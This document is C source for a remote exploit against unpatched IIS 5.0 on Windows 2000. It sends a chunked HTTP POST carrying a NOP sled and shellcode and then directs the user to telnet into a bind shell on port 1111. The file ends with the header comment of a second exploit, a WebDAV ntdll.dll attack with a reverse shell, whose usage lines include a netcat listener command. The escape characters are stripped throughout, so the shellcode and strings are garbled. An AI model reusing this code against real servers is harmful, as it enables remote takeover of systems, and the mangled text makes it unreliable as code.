/* Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD http://www.chinansl.com
[email]keji@chinansl.com[/email]


Tested on Win 2k, IIS 5.0 Normal Version, by Rafael [RaFa] Nunez [email]rnunez@scientech.com.ve[/email]
Patched Code.
*/

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])
{
if(argc != 4)
{
printf("%s ip port aspfilepathnn",argv[0]);
printf(" ie. %s 127.0.0.1 80 /iisstart.aspn",argv[0]);
puts(" programed by [email]keji@chinansl.com[/email]");

return 0;
}

DWORD srcdata=0x01e2fb1c-4;//0x00457474;
//address of SHELLCODE
DWORD jmpaddr=0x00457494; //0x77ebf094;/ /0x01e6fcec; //"x1cxfbxe6x01"; //"x0cxfbxe6x01";

char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
char* pad="xccxccxccxcc" "ADPA" "x02x02x02x02" "PADP"; //16 bytes

WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0x0101,&ws) != 0)
{
puts("WSAStartup() error");
return -1;
}

struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
{
puts("Socket create error");
return -1;
}

if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1)
{
puts("Cannot connect to the specified host");
return -1;
}

char buff[4096];
char* shellcode="x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x89"
"x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32"
"xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab"
"x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f"
"xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89"
"x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0"
"x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89"
"x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe"
"x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56"
"xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc"
"xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89"
"x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89"
"x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89"
"x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a"
"x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3"
"x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45"
"xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8"
"xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a"
"x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32"
"xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0"
"xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0"
"xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55"
"xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10"
"x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff"
"x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33"
"xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55"
"xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50"
"xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0"
"xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47"
"x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c"
"xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff"
"xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff"
"x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89"
"x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50"
"x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85"
"xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53"
"xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d"
"x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff"
"x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90"
"x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0"
"x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8"
"x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85"
"x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff"
"xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4"
"xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a"
"xffxffx95x18xffxffxff";


char* s1="POST ";// HTTP/1.1rn";
char* s2="Accept: */*rn";
char* s4="Content-Type: application/x-www-
form-urlencodedrn";
char* s5="Transfer-Encoding:
chunkedrnrn";
char* sc="0rnrnrn";

char shellcodebuff[1024*8];
memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;


char sendbuff[1024*16];
memset(sendbuff,0,1024*16);

sprintf(sendbuff,"%s%s?%s HTTP/1.1rn%sHost: %srn%s%s10rn%srn4rnAAAArn4rnBBBBrn%s", s1, destFile, shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);


int sendlen=strlen(sendbuff);
*(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
*(DWORD *)strstr(sendbuff,"AAAA") = srcdata;

result=send(s,sendbuff,sendlen,0);
if(result == -1 )
{
puts("Send shellcode error!");
return -1;
}

memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);

if(strstr(buff,"<html>") != NULL)
{
shutdown(s,0);
closesocket(s);

puts("Send shellcode error!Try again!");
return -1;
}


shutdown(s,0);
closesocket(s);
printf("nUse <telnet %s 1111> to connect to the hostn",destIP);
puts("If you cannot connect to the host,try run this program again!");

return 0;
}

/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* I know I code like a pig, my english sucks, and my tech too */
/* it is my first exploit..and my first shellcode..sorry :P */
/* if you have comments feel free to mail me at: */
/* mailto: [email]kralor@coromputer.net[/email] */
/* or visit us at http://www.coromputer.net . You can speak with us */
/* at IRC undernet channel #coromputer */
/* ok now the greetz: */
/* [El0d1e] to help me find some information about the bug :) */
/* tuck_ to support me ;) */
/* and all my friends in coromputer crew! hein les poulets! =) */
/* */
/* Tested by Rafael [RaFa] Nunez [email]rnunez@scientech.com.ve[/email] */
/* */
/* (take off the WSAStartup, change the closesocket, change */
/* headers and it will run on linux boxes ;pPpPpP ). */
/* */
/*******************************************************************/